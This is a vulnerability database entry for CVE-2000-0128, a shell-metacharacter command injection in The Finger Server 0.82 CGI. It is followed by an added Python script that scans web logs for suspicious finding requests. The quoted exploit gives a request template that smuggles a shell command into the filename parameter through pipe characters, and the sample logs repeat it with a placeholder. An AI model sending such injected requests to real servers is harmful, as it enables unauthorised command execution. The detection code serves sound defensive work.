Finger Server Command Execution Vulnerability

Vulnerability ID 1105703 Vulnerability type Unknown
Published 2000-02-04 Updated 2005-05-02
CVE ID CVE-2000-0128
CNNVD-ID CNNVD-200002-029
Platform CGI CVSS score 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/19745
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-029
|Vulnerability details
The Finger Server version 0.82 contains a vulnerability. Remote attackers can execute commands by means of shell metacharacters.
|Exploit
source: http://www.securityfocus.com/bid/974/info

'The Finger Server' is a Perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the server which will run with the privileges of the webserver.

A request like:
http ://target/finger.cgi?action=archives&cmd=specific
&filename=99.10.28.15.23.username.|<shell command>|
(split for readability)
will cause the server to execute whatever command is specified.
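
A defender-side check for the request pattern described above, as an added example that is not part of the original advisory or of The Finger Server: it scans web access log lines for finger.cgi requests whose filename parameter falls outside an allow-listed shape. The filename pattern is an assumption inferred from the sample request, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed shape of a legitimate archive name, inferred from the sample request
# on this page: five two-digit fields, a user name, an optional trailing dot.
SAFE_NAME = re.compile(r"\A[0-9]{2}(?:\.[0-9]{2}){4}\.[A-Za-z0-9_-]{1,32}\.?\Z")
# Shell metacharacters that have no place in an archive file name.
SHELL_META = set("|;&`$<>(){}!\\\n\r\"'*?")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(filename):
    """Return 'ok', 'metachar' or 'malformed' for one decoded filename value."""
    if SAFE_NAME.match(filename):
        return "ok"
    if SHELL_META & set(filename):
        return "metachar"
    return "malformed"

def scan(log_lines, script="finger.cgi"):
    """Return (line_number, verdict, filename) for each suspicious request."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so %7C and a literal | are treated alike.
        values = parse_qs(url.query, keep_blank_values=True).get("filename", [])
        for value in values:
            verdict = classify(value)
            if verdict != "ok":
                findings.append((n, verdict, value))
    return findings

# Constructed sample log lines (not from a real server).
SAMPLE = [
    '192.0.2.10 - - [04/Feb/2000:10:00:00 +0000] "GET /cgi-bin/finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.alice. HTTP/1.0" 200 512',
    '192.0.2.77 - - [04/Feb/2000:10:00:05 +0000] "GET /cgi-bin/finger.cgi?action=archives&cmd=specific&filename=99.10.28.15.23.alice.%7Cplaceholder%7C HTTP/1.0" 200 40',
    '192.0.2.78 - - [04/Feb/2000:10:00:09 +0000] "GET /cgi-bin/finger.cgi?action=archives&cmd=specific&filename=latest HTTP/1.0" 200 40',
    '192.0.2.10 - - [04/Feb/2000:10:00:11 +0000] "GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The same allow-list, applied inside the CGI before the value reaches any file or shell operation, rejects the request outright instead of only reporting it afterwards.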
|References

Source: www.glazed.org
Link: http://www.glazed.org/finger/changelog.txt
Source: OSVDB
Name: 7610
Link: http://www.osvdb.org/7610